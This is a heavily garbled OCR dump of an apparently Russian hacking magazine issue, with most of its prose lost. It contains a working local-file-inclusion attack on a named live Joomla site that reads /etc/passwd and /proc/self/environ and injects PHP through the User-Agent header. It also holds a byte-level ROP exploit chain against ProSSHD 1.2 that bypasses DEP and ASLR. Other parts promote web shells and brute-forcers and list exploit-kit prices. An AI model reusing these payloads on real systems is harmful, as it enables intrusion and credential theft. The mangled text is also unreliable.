: 0,1,2,.. .

3 : 0, 1 >1.
,
.
: , ../, a%00 .. ,
,
.

. ,

. ,

:
.
:

.
.
:
(False
Positive ),
,
.
:
. ,
.
,
. ,
, ,

.
,
. ,
10-15 ,
.

URL http://example.com/main/search/stroka_
poiska, ,
stroka_poiska ,
, ,
,
URL-, . .

. (5-9 ),
.

(False Positive).
, URL http://example.com/main/search/test
test.
.
http://
example.com/main/search/test (, <b>test</b> )
, test.
,
.

4. .
http://example.com/script.
php?param1=value&param2=value&&abc=value. URL 8192
( Apache). ,
[a-z0-9] 4 5880 .
3-5 .

5. .
,
.
-

.
:
.
:
.
( )
.
:
,
(, ,
).
.
:
.
:
,

(,
).
- ( 1-2 5-7 ,
1,5-2 4 ).

http://example.com/main/search/stroka_poiska,
stroka_poiska
. ,
, .


,
.
:
1. , (
params.txt), (
+ (_,-) +
). ,

(param[]).
2. .
3. (
, ).
4. (, http://example.com/index.php?page=admin)

HTTP://WWW
links

:
owasp.org/index.
php/Double_Encoding
dimoning.ru/kaknapisat-svoy-dvizhokbloga-1.html
webscript.ru/stories/07/02/01/
2099269]
ru.wikipedia.org/wiki/
_
raz0r.name/mysli/
proveryajte-tip-dannyx/hardened-php.
net/globals-problem
hardened-php.net/
advisory_192005.78.
html
wisec.it/vulns.
php?id=10
hardened-php.net/
hphp/zend_hash_del_
key_or_index_vulnerability.html

DVD
dvd
Yummy...


,

:

;


;


;

( ,
, ).

5. , .
..:
MaxPatrol Positive Technologies.

...

-,
mod_rewrite, ,
register_
globals, , (debug)
.. ! z

WARNING
warning


!
,



rsimplex.light@gmail.com; http://www.youideas.ru

ProcFS
Web-
PROCFS

, Web- ,
: SQL-, lfi, rfi ..
! , ,
,
, .
.
: Gmail,

Joomla jresearch. ,
local file including (lfi). require_once(),
,
. , ,
. URL jresearch,
, - rediscoverscience.com.
.
, , :
http://rediscoverscience.com/component/jresear
ch/?task=show&view=publication&id=18&controlle
r=../../../../../../../../../../etc/passwd%00

. shadow.
, :).



.
, CMS Joomla,
, ,
configuration.php (
, FTP ).
. ,
: PHP (
PHP-).
PHP- ,
.

- . :
PHP-,
, . ,
, ,
,
proc: /proc/self/environ,
/etc/passwd.


,
. ,
, :
http://rediscoverscience.com/component/jres
earch/?task=show&view=publication&id=18&con
troller=../../../../../../../../../../../../
proc/self/environ%00

PROCFS

ProcFS ( process file system)


,
Unix-like

.
/proc. /proc
, ,
. ProcFS
Linux, Solaris, BSD, QNX .
ProcFS:
/proc/PID/cmdline
( PID self);
/proc/PID/environ
;
/proc/PID/status ;
/proc/PID/fd ,

;
/proc/cpuinfo
(, , ..);
/proc/cmdline ,
;
/proc/uptime ,

;
/proc/version
, ,
.


cpanel

PHP,
:
DOCUMENT_ROOT ;
SERVER_ADDR IP- ;
SCRIPT_FILENAME index.php;
HTTP_USER_AGENT ,
;
HTTP_COOKIE ..

, , , . ,
, , -
PHP-, !
, PHP . c "ja_purity_tpl",
CMS,
<? phpinfo(); ?>. /proc/self/
environ .
, , -
.
"__utma" <? phpinfo(); ?> :
.
, ,
user-agent. ,
<? phpinfo(); ?> PHP, PHP.
configuration.php, , ,
user-agent ,
:
<? readfile("/home/redisco3/public_html/
configuration.php"); ?>

/proc/self/environ.
,
configuration.php.

WARNING

warning
!

.
,

HTTP://WWW
links
securitylab.ru/
vulnerability/392546.
php

packetstormsecurity.org/1003-exploits/
joomlajresearch-lfi.
txt PoC-

jresearch
xakep.ru/
post/49508/default.
asp ][

:

local
remote file include
xakep.ru/magazine/xa/111/146/1.
asp ][


HTTP-

Include cookie

phpinfo()

PROCFS

.
CMS , , .
. ,
proc, : /proc/cpuinfo
, xeon'e, /proc/version
:
Linux version 2.6.31.9-grsec (root@web55.justhost.
com) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-46))
#1 SMP Thu Feb 25 02:14:17 CST 2010

, ,
cpanel. ,
FTP.
, .

, :
-


()
. , ,
, .
:).z

, Digital Security a.sintsov@dsec.ru

ROP
ROP
ROP
ROP
ROP
VIRTUAL PROTECT
Param1
Param2
Param3
Param4
JUMP ESP
NOP
NOP
SHELLCODE

0x06060101
pop ecx
retn
0x06060201

1.
2.
3.

pop eax
retn

0x06060101
0xBAADF00D
0x06060201
0x01020304

0x06060301

0x06060301

mov [eax], ecx


retn

ROP:

ROP,
-
, , ROP.
(
, ..) permanentDEP ASLR.
?

, ! DEP ASLR.
,
, Microsoft. ret2libc
DEP , permanent DEP + ASLR
JIT-SPRAY ( JIT-, , Flash). , ,
,
,
. JIT SPRAY

, , ,
, ROP,
. , ,
Flash JIT-SPRAY.
, , ; , , , malware
Acrobat Reader (CVE-2010-0188)
. , pwn2own
iPhone PHP 6.0 DEV.
,
.


0x06060101 // AAAA

0xBAADF00D // BBBB
0x06060201 // CCCC

0x01020304 // DDDD
eax
0x06060301 // EEEE

: 0x61616161!

--...

HTTP://WWW
links
cseweb.ucsd.
edu/~hovav/dist/
geometry.pdf

ROP
(2007 ).
blip.tv/file/3564232

Source Boston 2010.




ROP.
dsecrg.com

ret2libc.
,
.
( , , ),
hardware-permanentsuper-puper-DEP. hardwareDEP ret2libc . ,

. ,
. : . , , , ,
, .. ,
API-, , ,
, ,
. - , ,
.
, . ,
- (, 0xBAADF00D)
(, 0x01020304)?
(
),
.
:
pop ecx ;
pop eax ;
mov [eax], ecx ;

,
, ,
,
.
0x06060101: pop ecx
0x06060102: retn
. . .
0x06060201: pop eax
0x06060202: retn
. . .
0x06060301: mov [eax], ecx
0x06060304: retn



ecx
retn
retn

,
:
[BUFFER][RET]

ROP :
[BUFFER][AAAA][BBBB][CCCC][DDDD][EEEE]

, , ,
. -,
, -,
( ,
SEH-, ROP
). , ROP-
. C
. ,
.
? ,
VirtualProtect (
) , , WriteProcessMemory (
). ASLR
, ,
? - , .
, ASLR ,
,
, DLL (
FireFox,
Windows 7 ASLR+DEP pwn2own 2010). ,
,
ASLR ,
.
(Alex Sotirov)
BlackHat 08.
DLL.
.

ROP REST ON PAIN

ROP-. . ActiveX
ProSSHD
1.2. SSH- Windows.

SCP-. S2 Crew,
. :
491 , 4
. ,
, ,
495 . :
[491 'a' 0x41][RET=EIP]


ASLR

[AAAAAAAAAAAAAAAAAAAAAAAA]
^
ESP

, [RET] [AAAAAAA]
ROP-. , , .
, . , (/GS)
SEH,
, , , ESP . (SEH- )
, ESP (
) ,
RETN ROP. ,
- :
add esp, 0xXX
retn

- :
mov esp, ecx
retn
;
xchg ecx, esp
retn

, . Immunity Debugger
orelan0d3r.
, ,
, ROP ,
. ,
, ASLR, Windows 7.
, ProSSHD
: MFC71.DLL MSVCR71.DLL.
ROP;
DEP + ASLR. DEP?
,
VirtualProtect() 0x7C3528DD (MSVCR71.DLL).
; - ASLR ,
MSVCR71.DLL . ,
,
. , ,
, VirtualProtect.
VirtualProtect :
VirtualProtect(
    IN LPVOID lpAddress,       //
    IN SIZE_T dwSize,          // 0x1
    IN DWORD flNewProtect,     // 0x40
    IN PDWORD lpflOldProtect   // , ( )
);


DEP, . - ROP.
: VirtualProtect MSVCR71.
DLL, , ,
RETN, EBP.
( ),
, EBP-0x58 LEAVE
.
7C3528DD  CALL DWORD PTR DS:[<&KERNEL32.VirtualProct>
7C3528E3  LEA ESP,DWORD PTR SS:[EBP-58]
7C3528E6  POP EDI
7C3528E7  POP ESI
7C3528E8  POP EBX
7C3528E9  LEAVE
7C3528EA  RETN

, :
0x00:0x7C3528DD
0x04:ADDRESS_1
0x08:0x00000XXX
0x0C:0x00000040
0x10:ADDRESS_2

------

VirtualProtect


READ_WRITE_EXECUTE
, ESP

. 4 .
VirtualProtect MSVCR71.DLL.
, ,
. ,
, ,
.
, ,
. ,
, VirtualProtect . .
.
, . , ,
, - .
.
0x0012XXXX.
. -
ROP. . JIT SPRAY , DEP
. ROP-
100% . :
0x000:ADDR_1
0x004:ADDR_2
. . .
0xX00:ADDR_X
0xX04:0x7C3528DD
0xX08:ADDRESS_1

-- ROP-

-- VirtualProtect



0xX0C:0x00000XXX
0xX10:0x00000040
0xX14:ADDRESS_2
0xX18:RET_ESP
0xX1C:0x90909090
0xX20:SHELLCODE

-- 0xX0C
-- NOPs

ROP-
VirtualProtect 0xX08, 0xX0C, 0xX10, 0xX14. ,
. ProSSHD.
, EDI EBP
ESP.
, EDI EBP ,
. EDI ESP, ,
1049 . ROP-, ,
ROP- VirtualProtect,
RETN.
NOP ROP.

ITS ALIVE!

. , RETN.
. ,
.
, , ,
. ?
, , orelan0d3r
ROP- ()
, . (Peter Van Eeckhoutte
corelanc0d3r) -
, . ,
RETN

. ,
ROP- . ,
-
EAX, . EAX .
,
EDI (, ) EAX EDX.
,
EAX, EDX. .
, .
(
).

VirtualProtect,
0x40, EAX, , ,
ECX. EAX . ,
EAX
ECX.
"\x27\x34\x34\x7C".
POP ESI / RETN 10
"\x33\x33\x33\x33".

# MOV ECX, EAX / MOV EAX, ESI /


# ESI

, ECX, EAX -
0x40. , EAX -0x40, NEG EAX.
. , -0x40=0xFFFFFFC0,
, ,
POP EAX. 16 ,
RETN 0x10.
"\xC1\x4C\x34\x7C".
"\x33\x33\x33\x33".
"\x33\x33\x33\x33".
"\x33\x33\x33\x33".
"\x33\x33\x33\x33".
"\xC0\xFF\xFF\xFF".
"\x05\x1e\x35\x7C".

#
#
#
#
#
#
#
#
#

/ RETN

-0x40: EAX
NEG EAX / RETN

. EAX 0x00000040.
ECX ,
VirtualProtect,
.
"\xc8\x03\x35\x7C".

# MOV DS:[ECX], EAX / RETN

ECX EAX.
"\x40\xa0\x35\x7C".

# MOV EAX, ECX / RETN


VirtualProtect (-0x40).
, .
EAX 12 ( ),
( 4 )
.
"\xA1\x1D\x34\x7C"x12.

,
. .

POP EAX

# DEC EAX

/ RETN

EAX EAX+4.
.

$fuzz = "\x41"x491 .
"\x08\x94\x16\x7C".


ROP-. ( EDI) EAX.

# MOV DS:[EAX+0x4], EAX / RETN

EAX 4 .
"\xB9\x1F\x34\x7C"x4.

"\x9F\x07\x37\x7C".
ESI / RETN

8 (
EDI ESI), 8 ,
.
"\x11\x11\x11\x11".
"\x22\x22\x22\x22".


# INC EAX / RETN

# MOV EAX, EDI / POP EDI / POP

# EDI
# ESI

EAX ,
EAX+4 ,
. ,
, . -, 1
.
.
"\xB2\x01\x15\x7C".

# MOV [EAX+0x4], 1



ASCII-.

,
VirtualProtect. -
. ESP .
EAX 16 .
"\xA1\x1D\x34\x7C"x16.

# DEC EAX

ROP

/ RETN

ECX.
"\x27\x34\x34\x7C".
POP ESI / RETN 10
"\x33\x33\x33\x33".
"\x40\xa0\x35\x7C".
"\x33\x33\x33\x33".
"\x33\x33\x33\x33".
"\x33\x33\x33\x33".
"\x33\x33\x33\x33".

# MOV ECX, EAX / MOV EAX, ESI /


#
#
#
#
#
#
#

ESI
MOV EAX, ECX / RETN

ECX. EAX ,
EAX+20 , , (
0x40).
"\xB9\x1F\x34\x7C"x4.

# INC EAX / RETN

.
"\xE5\x6B\x36\x7C".

# MOV DS:[EAX+0x14], ECX

412 .
4 VirtualProtect
408
.

,
, . ,
JIT SPRAY, ,
. ,
0x7c345c2e ANDPS XMM0, XMM3.
2 ,
PUSH ESP / RETN.
, RETN , EIP.
"\x30\x5C\x34\x7C".

# PUSH ESP / RETN

, .
NOP.

"\xBA\x1F\x34\x7C"x204 . # RETN
"\x90"x14 .

# NOP

, VirtualProtect.
"\xDD\x28\x35\x7C". # CALL VirtualProtect / LEA ESP,
[EBP-58] / POP EDI / ESI / EBX / RETN

, ( bind shell 4444


).
$shell;

, . ROP-.
"AAAABBBBCCCCDDDD".

12
. :).
"\x1A\xF2\x35\x7C".
"XXXYYYZZZ123".


# ADD ESP, 0xC / RETN


# , -

. ,
, .
, .
, : 0day
, 300%
0day iDefense ZDI. , , ,
. , , $$$. ! :) z



icq 884888

X-TOOLS

: ArxFuckingHash3
: WINDOWS 2000/XP/2003
SERVER/VISTA/2008 SERVER/7

Bind port/Backconnect ( );
;
.

- Perl

: ARXWOLF


webxakep.net
-.
, -
(md5, MySQL, Sha1)
. ?
-
,
? !
ArxFuckingHash3, !

.
:
(10 10 );
md5, MySQL, Sha1 ;
-
( servers.ini);

;
;
;
;
;
( ./help).

-
,
webxakep.net/forum/showthread.php?t=4753.

: PPS 1.0 PERL


WEB-SHELL
: *NIX/WIN
: PASHKELA

-,
PHP.



.
- PPS 1.0 , .

PHP-:
(
"root");
;
;
, , , ,
;
;
chmod, touch, zip, unzip

;
;
MySQL-;
backconnect;
Perl- -;
;
POST-.


forum.antichat.ru/
thread198119.html.

: CGI WEB SHELL


: *NIX
: ORB

-,
, PHP,
CGI web shell ,
- :

- Python

http://forum.
antichat.ru/showthread.php?t=147269.

: PROXY SCANNER
: *NIX/WIN
: SHARKY

, ,
- -.

Proxy Scanner Sharky.

IP-, .
,
,

.
Proxy Scanner'
:
1. proxyscanner.pl;
2. :
Start IP ( IP , ,
192.168.1.1);
End IP ( IP , ,
192.168.255.255);

;
, , , touch-, chmod-;

;
;
Python'e
-;

Port ( , , 3128);
Timeout ( , , 10);
Threads (, , 50);
File for good proxies (
, , proxies.txt).
,
, enjoy!

: LAMESCAN2 ANTIRADMIN
: WINDOWS 2000/XP/2003
SERVER/VISTA/2008 SERVER/7
: REDSH

ins ;
f9
;
shift+f9 ;
f5 ;
f7 HTML;
f2 ;
f3 ;
ctrl+ins,

.

: http://redsh.
tk
.

: RSAEMAILCHECKER 2.0
:WINDOWS 2000/XP/2003
SERVER/VISTA/2008 SERVER/7
: RSARELIABLES

LameScan2 .
:
;
;

-,
, up, down error
(
,
, -
);


;
.csv
;

CSV HTML;
SDK;

IP-.


antiradmin LameScan2. ,
radmin 2.0, 2.1 2.2 .
:
;
;

;
( ,
, ).


:

e-mail
rsaEMailChecker
e-mail
. :

;
;
;
;

e-mail ;
(
);
POP3;
;
( );
;
;
(user@
server.domen;password user@server.
domen:password);
.Net Framework 2.0 .

:
,
;
... ,
;

"connected == false" ,

;
"invite == false" ,

(, POP3- /
);
"user == -err" ,

POP3-;
"bad" ,
;
"good" ,
.

,
webxakep.net,
http://webxakep.net/
forum/showthread.php?t=6348.

: JBBL JABBER BRUTE


BY LYTGEYGEN V.0.1
: WINDOWS 2000/XP/2003
SERVER/VISTA/2008 SERVER/7
: LYTGEYGEN

? :). ,
jbbl Jabber-.
:
Visual Basic
xmpp;
( 100 );

;

Jabber-
;
good.
txt;
;
Jabber-
.


: forum.asechka.ru/showthread.
php?t=119636.z


MALWARE
VIRUSES
vaber@inbox.ru

: AVG, AVIRA AVAST?


] [ , ,
. , -
: autorun-,
. : AVG, AVIRA
AVAST. ,
.

,
. , , . IE6
IE7, Adobe (Flash Player, PDF Reader),
RealPlayer JAVA. IE,
][.
, , ,
.
iframe,
, .
,

, .
:
Eleonore Exploits pack
Phoenix exploit kit
NeoSploit
YES exploit kit
Siberia Exploits kit


Seo Sploit pack


Crimepack Exploit System

, , , . , -,
. , ,
.
, ,
.
MDAC (MS06-014),
2006 . IE6
.
, , malware. ,
IE6/7
Adobe Acrobat Reader,
Oracle Corporation JAVA.
IE,
.
Acrobat Reader:
Adobe Acrobat Reader
Adobe Collab.collectEmailInfo CVE-2007-5659

>> coding


,
.
5 20%, 10%.

, , .
Phoenix exploit pack
: MDAC, MS Office Snapshot, JRE, Flash10,
CVE-2010-0806, Adobe Acrobat Reader
( 2.0): $400

Crimepack Exploit System


: MDAC, DSHOW, MS09-002, Flash10, Adobe
Acrobat Reader, JRE
( 2.8.1): $400
Eleonore Exploits pack
: MDAC, JDT, PDF collab.getIcon, PDF collab.
collectEmailInfo, PDF NewPlayer, Java GSB 1.5/1.6
( 1.4.1): $1500

IP. /
IP
$50.

: $50-80
.

Adobe
Adobe
Adobe
Adobe

Util.printf CVE-2008-2992
GetIcon CVE-2009-0927
Media.newPlayer CVE-2009-4324
Pdf libtiff CVE-2010-0188

JAVA:
JAVA
Deserialize CVE-2008-5353
GetSoundBank CVE-2009-3867

?
.
,
( ,
? :)), , .
,

( iframe),
- .

, . ,
:

KAV
1. ,
;
2.
,
;
3.
;
4. ;
5. ( , )
;
6.
.

.
,
, ,
. ,
.
,

Drive-by, , .
AVAST! Internet Security, Kaspersky Internet Security,
ZoneAlarm Extreme Security, HIPS DefenseWall .
,
free-.
: AVIRA, AVG AVAST!. ,

, ,
Kaspersky anti-virus.
, ,
:

DVD
dvd

Drive-by

.

,
,

OllyDbg

TDL3 (TDSS, TidServ,
Alureon).

AVASt!


MALWARE

Phoenix exploit pack


on-demand

-
,

AVG

on-demand

-

phpnuke.org
on-demand

-
,



, . :
1. Vmware Windows XP SP3 32-bit
Internet Explorer 7.0.5730.13 (
, ).
Adobe Reader 8.1.1 JAVA jre 1.5.0.10. ,

AVIRA

on-demand
KAV

url url

exploits pack


AVIRA
10.0.0.567

AVAST
AVG AVP 9.0.0.736
5.0.507 9.0.814
(a,b)


>> coding

AVIRA :)
, Adobe Reader
JAVA.
2. ,
. , .
:). ,
.
3. snapshot, , .
4. , malwaredomainlist.com
URL, exploit pack.
, , payload
( ,
, ) ,
, .
exploit pack .
5. snapshot , .
, .
,
, .
malware -, ,
, :). . / .
.
,
, .

, Kaspersky AVAST! Drive-by. ,


:). ? , ,
? ! .

malware, , :
1. ;
2. Windows ,
;
3.
, .
Adobe (Acrobat
Reader, Flash Player), JAVA, WinZip, Firefox, Opera,
Foxit, RealPlayer;
4. Sandbox
( ) . , ;
5. , ,
, ,
, ;
6. . z


MALWARE
VIRUSES



,

Dr. Web
.
?
- .
, , -
, , .

?
- 1997
IBM PC.
, , !
,
DOS, Win3.1,
Win9x. , .
?
,
.
Far Manager ( , , ),
Hiew hex-
. , .
IDA Pro + Hexrays ,
reverse engineering.
OllyDdbg WinNT.
, .
. , ,

,
, .

, ?
,
. ,
, , Dr.Web.

,
. , , Dr.Web Virus Chaser.
-,
(virustotal.com/jotti.org/virscan.org ..),
-


. , honeypots
, . .
.
:
,
, ,
, .
, . . , ( )
.
,
, .
. , , .
, , .
, .
, , .
, .

. .

?
Linux.Hasher.
, Linux-, ELF-.
.
, , .
.hash,
ELF
. Linux.Hasher
,
.
219 . z


Mifrill mifrill@real.xakep.ru

,
?
. , ? ! VoIP , ,
Skype. - .
SKYPE,

XIX-XX ,
,
, . ,
(, )
,
- .

, . : 15
,
,



- ( ,
,
, ,
, ).
,

, .
, 1964 AT&T
-,
. ,
Picturephone Mod I
-
. , ,
. ,
, 3
: (
1 )

. 2 .
.
-
$16 3 , $27,

. , 1968 .
, .
-, ,

.
,

. ,

SKYPE ()
.

60- ,
80-,

SKYPE 4.0


ISDN (Integrated Services


Digital Network) ,
, ,
. ,


Voice over IP (VoIP) 90- .
,
Internet
Phone, VocalTec. Internet Phone
1995 , ,
IM+,
. , ,
omigod, its
magic!!11. , ,
, (
VocalTec
,
).
, , ,

Internet Phone
. -
,


IP-,
VocalTec Telephon
Gateway (VTG).
1997
,
,
.
1999 SIP (Session
Initiation Protocols),
1996 IETF,
. H.323
, ,
,
.

, Skype.

CU-SEEME

SKYPE

1967 ,

, - .
, 1995
DigiPhone, .

.
90-
CU-SeeMe, Mac,
Windows. ,
CU-SeeMe 1994 Endeavor NASA
.
VoIP,
IP-, ,
1996 . International
Telecommunication Union
,


,
,
.323,
50 .
,
- ,
.
,
, Internet Engineering Task Force (IETF),

,
Realtime Transport Protocol (RTP),
.323.
VoIP
:
1996
VocalTec
Dialogic.
-

Skype
,
(Ahti Heinla), (Priit
Kasesalu) (Jaan Tallinn).
, , - ,
Skype
(Janus Friis)
(Niklas Zennstrom).
, .
,
, ,
. , .
, 2000-

P2P- KaZaA,
.
Skype, IT-

, ,
.
?
. ,



( KaZaA, Skype),
. , Skype ,
, .
,
Skype ,
.
Skype
2002
Draper Investment Company,
:
Skype.com Skype.net
,
-
2003 . ,


SKYPE IPHONE

Skyper (
Sky peer-to-peer),

Skype, Skyper
.
, Skype
,
,
? , IP-, Skype

P2P-,
,
. ,
:
,

PICTUREPHONE II AT&T


VOIP .
(
, ). Skype

, , NAT

(
).
Skype IP-
,
SIP,
.

Skype, SIP ,
.
SIP HTTP-
SIP, HTTP,
,
.
,
SIP, , ,
.
Skype, SIP ;
,
,
.
,
,

(, ,

). SIP

-.
Skype SIP, , Skype-
SIP.
, : Skype ,
P2P- (
AES-256,
, ,
1024- RSA.
Skype
1536- 2048-
RSA), SIP
.
,
Skype
UDP,
TCP-, , Skype
HTTP-.
,
Skype
, Skype, , . .

, -


SKYPE
SKYPE
, ! , ,
, ,
,
Skype .
Skype , . 2007
][ ,
Skype: .
: Skype

, ,

.
, .
Skype , ,

Skype-.
Skype , :
.
,
2003 , Skype 10
, IM,
.
,
,
. , Skype
SVOPC (16 ), AMR-WB (16 ),
G.729 (8 ) G.711 (
ILBC ISAC), (30-60 /)
,
.
2003 ,
Skype .

. , , ,
SMS


,
Skype
:).
,
, 2005 ,
(74,7 .
10,8 . ),
eBay .
, Skype
,
:
Skype
560 . ;
Skype
,
;
VoIP;
Skype - Skype- ,
,
Skype.

,
Skype,

, , .
,
.
,


. , ,
, .

,

Tele2, 1996
.
,
, 2000 ,
KaZaA.
,
,
,
.


,
.
Napster, ,
, ,
KaZaA.
-, ,

.

,
,
.
,
,
, KaZaA .
,
KaZaA
Sharman Networks,
. -
, -
, KaZaA.

, Joltid,

.
,
.

1878
,
Skype.
,
Skype,

(
, KaZaA)

. ,
,
Skype CEO
2007 ,
eBay.
, eBay. ,
2005 ,
Skype eBay
2,6
1,5
,
Skype (
eBay ). , ,
, , ,
,

. - .

Joost, ,
Skype
. , , :
53
400 , Skype 2008
33 ,
eBay .
Skype
, , 2009

, ,

Skype
.
.
,
eBay Skype (

:
),
2009
. , Skype, eBay

. -,
Joltid. ,
Skype ,
,
. ,
New York Times, , ,
Skype

,
.
,
eBay
Joltid , ,

. .

.
eBay,
, 65%
Skype Andreessen
Horowitz 2 . .
,
Skype,

$75 .
. ,


( , eBay 35%
!),
Joltid ,
Skype. , ,
, , eBay
Skype ,
.

, 2009 .
,
. eBay, - - Skype,
.
,
, 14%
Skype.
,
eBay
.
, , ,
,
. , Skype ,
, . ,
Joltid
, eBay
Skype .
,

, ,
,
Joltid
.

: Skype
?, , ,
. -,
-
(
Skype
, ).
,
Skype, VoIP-

,
. , Skype :
VoIP,
,
, .
-
,
, Skype , ,
,
. z


UNIXOID
zobni n@gmail.com

Qubes OS


Qubes OS
Linux

- .

, ,
, .
,
. Qubes OS
, .

?
, Qubes
OS, ,
-


,
.
:

;

;
(
).


Qubes OS

?
. -,

Blue Pill (http://bluepillproject.org),
,
, .
eWeek (http://eweek.org) ,
2006 (Five Hackers who Put a Mark on 2006).
2009 Rafal Wojtczuk
Intel TXT Intel
System Management Mode (SMM). Invisible Things Labs (http://invisiblethingslab.com),
.

( ) ,
,
.
( ).
,
,
(
), , .

.
,
(Flawfinder,

RATS, Skavenger, lint ..). , OpenBSD


,
, . Coverity
(Coverity Prevent) , .

( )
, .
, Microsoft
BSD-.
.
, , , .

.
, .
,
.
, ,
(
root).
,
.
,
,
,
, nobody
SELinux BSD Jail.
(-, ),
(
,
: ,
..).


, ,
, . ,
.
,


,

. ,
(
, , )
. ,
( ),
.

, ,
.
,
. -, ,
-,
.
.
? .

: QUBES OS
Qubes OS (http://qubes-os.org) Linux ( ),
(Joanna Rutkowska),
. Qubes OS
,

.
Xen (www.xen.org),
, Linux, , ( )
. Qubes OS .
( )
, .
( , TCP/IP, DHCP- ..)
, .
Intel VT-d.
(Dom0 Xen)
, X Window,

( ).
Xen Qubes OS ,


.
, ,
( , )
Linux. ,
,
Intel VT-d, , ,
, .


Qubes OS
, .
Linux
.
, Qubes OS :
Qubes OS ( Xen HVM), ,
, , , .
Qubes OS , , ,
,
. ,
Entertainment : , YouTube.
Shopping -.
Banking - . , ,
- Entertainment,
, Shopping
Banking, . ,
(
Qubes OS, ).

. ,
,
Linux.
copy-on-write (
Device Mapper).
COW-
.

( /home, /usr/local, /var). COW-
LUKS (The Linux Unified
Key Setup),

.
.
,
.


(Xen Dom0)
Qubes OS. , .

: ,
,
( , TCP/IP, DHCP-, ,
..), :
.
:
XenStore, ,
GUI-, X Window
KDE ( ,
, GUI,
).

Qubes OS.
3D-,
,
() . ,
, Qubes OS
,
. ,
.
(,
,
, ).
GUI X- (
), . ( ),
XGetImage X Window , Xen Ring buffer protocol, .
, AppViewer,
,
XRenderComposite.
Qubes OS ,
, .

Qubes OS



.
TCP/IP, , ,
WiFi- ,
.

, .
Qubes OS (Network
Domain) , . ,
,
Linux-, ,
, .
, ,
: ,

. , ,
, , ,
Entertainment, .

(
Qubes OS).
, Xen
.
eth0.
vifX.Y, X , Y . Xen vifX,Y
(, wlan0)
bridge,
, . Qubes OS,
, .

,
,
.


, ,
, .
, ATA SCSI, USB-,


Qubes OS
.
. Qubes OS
,
(Storage Domain).


.
Linux,
, ( ). ,
, :
.
.

, . , .
, Intel TXT. , , ,
.
, , , . , , Xen
.


Qubes OS :
1. ,

( ).
Intel TXT (Trusted Execution
Technology). ,
TPM (Trusted Platform Module).


2. , initramfs. , , ,
, TPM
.
3. initramfs ,
.
,
.
,
, keys.gpg, , .
4. keys.gpg initramfs .
5. Qubes OS , , keys.gpg.
6. ,
. initramfs
, , X Window, .
7. .
.

Qubes OS.

Qubes OS ,
- . ,
, ,
, ,
, Singularity (http://research.microsoft.
com/en-us/projects/singularity/),
. .z

UNIXOID
Adept adeptg@gmail.com

Linux
,
Linux ?
, , ,
, , !
.

, ,

. Linux . ,
Linux , 99%
, , ,
( , ,
).
, , Linux.
Ramen ( wu-ftpd
Red Hat 6.2 7.0), Badbunny
OpenOffice .

Linux. ,
,
, .
Linux-.


Linux.
Linux-


.
Linux 1-2%,
security- .
,
,
-.
Linux.
, , -
,
( , , ,
-).
,
Linux .

.
,
.

,
(,
).
Dr.Web Linux,
6
.
32-, 64- .
.run-,
.
.
,
- 30 (-
1 4 ).
Gnome DrWeb
( :
), ,

,
.
CLI- ,
:

Dr.Web Linux
AVG LiveCD
$ /opt/drweb/drweb ./

,
ini-, :
$ /opt/drweb/drweb -ini=/home/adept/.drweb/drweb32.ini ./

, 799
(GTK) CLI , DE, ,
.
,
Linux-.
Dr.Web, ,
Linux- .
. Linux Workstation , Kaspersky Total Space Security, Kaspersky
Enterprise Space Security, Kaspersky Business Space Security
Kaspersky Work Space Security ( 7700 ).
Linux
(5.7.26) 2008. deb
rpm, 32-, 64-.
( ), ,
webim kavmonitor (

). , kavmonitor
2.6.21 ( 32- ) 2.6.18 ( 64-),
-
. ,
CLI. :
$ sudo /opt/kaspersky/kav4ws/bin/kav4ws-kavscanner /tmp

:
$ sudo /opt/kaspersky/kav4ws/bin/kav4ws-keepup2date

/etc/opt/
kaspersky/kav4ws.conf.
ESET Linux- (ESET

NOD32 Antivirus 4 for Linux Desktop), , ,


-. -
.
, ,
. x86
x86-64, . /opt/eset.
GTK
,
. , : Setup (
) Tools ( ,
). CLI-, :
$ /opt/eset/esets/sbin/esets_scan ./

'-h' .
,
Linux- McAfee. ,
Linux-,
( , , -
IIS , :)). All-in-one

Linux: LinuxShield (,
) VirusScan Command Line Scanner for
Linux. LinuxShield 2 .
Command Line Scanner Linux (x86 x86-64),
: Windows, FreeBSD,
Solaris, HP-UX AIX. McAfee
,
11
, , , . Command Line Scanner
install-uvscan .
(
)
. , Ubuntu 10.04 ,
libstdc++.so.5.
(http://packages.debian.org/stable/base/libstdc++5).
, -
.
.
:

HTTP://WWW
links

products.drweb.
com/linux Dr.Web
Linux
www.freedrweb.
com/livecd Dr.Web
LiveCD
www.kaspersky.
ru/anti-virus_linux_workstation

Linux Workstation
beta.eset.com/linux
NOD32 Linux
www.bitdefender.
com/world/business/
antivirus-for-unices.
html BitDefender
Linux
free.avg.com/gb-en/
download.prd-afl
AVG Free Edition for
Linux
www.avast.com/
linux-home-edition
avast! Linux Home
Edition
www.clamav.net
ClamAV
code.google.com/p/
viavre/ ViAvRe

INFO

info
ClamAV
2008 (

).


DAZUKOFS

. -,
DazukoFS ( Dateizugriffskontrolle, ) , . DazukoFS
, , ,
. DazukoFS
.
Dazuko
GPL Avira GmbH. , DazukoFS,
.


$ uvscan ./

man uvscan
. LinuxShield
RHEL SLED, (, , ) . - . , 2.6.18.


( Linux-). , , BitDefender.
BitDefender Antivirus Scanner for Unices
.
, , for personal usage only.
BitDefender : deb- rpm, ipk ( ) tbz FreeBSD.
32-, 64- . 128 .
, .
GUI ( DE), CLI.
:

. ,
32-.
( : ;
: www.avast.com/registration-free-antivirus.php). GUI,
CLI-. :
$ avast ./

$ bdscan ./

:
:
$ sudo avast-update
$ sudo bdscan --update

, man bdscan .
AVG.
Linux (deb, rpm, sh . ,
32-) FreeBSD ( x86). 9-
, 8.5 ( 2010), .
.
: (RedirFS Dazuko).
, CLI.
:
$ avgscan ./

:
$ sudo avgupdate

avast. . deb, rpm


. , 32-.
DE. avastgui.


,
F-PROT. Linux: F-PROT Antivirus for Linux
Workstations. Linux (i386, x86-64 PowerPC), FreeBSD,
Solaris ( SPARC Intel) AIX. Linux (6.0.3)
2009 .
install-f-prot.pl. /usr/local/bin (
,
F-Prot, , ,
-, , /opt).

. :
$ fpscan /

: , (
30), ..
( man fpscan).
fpupdate ( ).

( )
OpenSource clamav. GUI

Dr.Web LiveCD

- NOD32

LiveCD
(clamtk GTK klamav kde).
DazukoFS. ,
.
, ,
. !


LiveCD ,
-
, . ,

LiveCD,
. , Dr.Web
LiveCD. (5.02) ,
- ( ). ,
6 Linux LiveCD .
, (, , 2.6.30), LiveCD
drweb ,

. SafeMode
.

KAV2010
Dr.Web, LiveCD , .
! :) LiveCD : http://
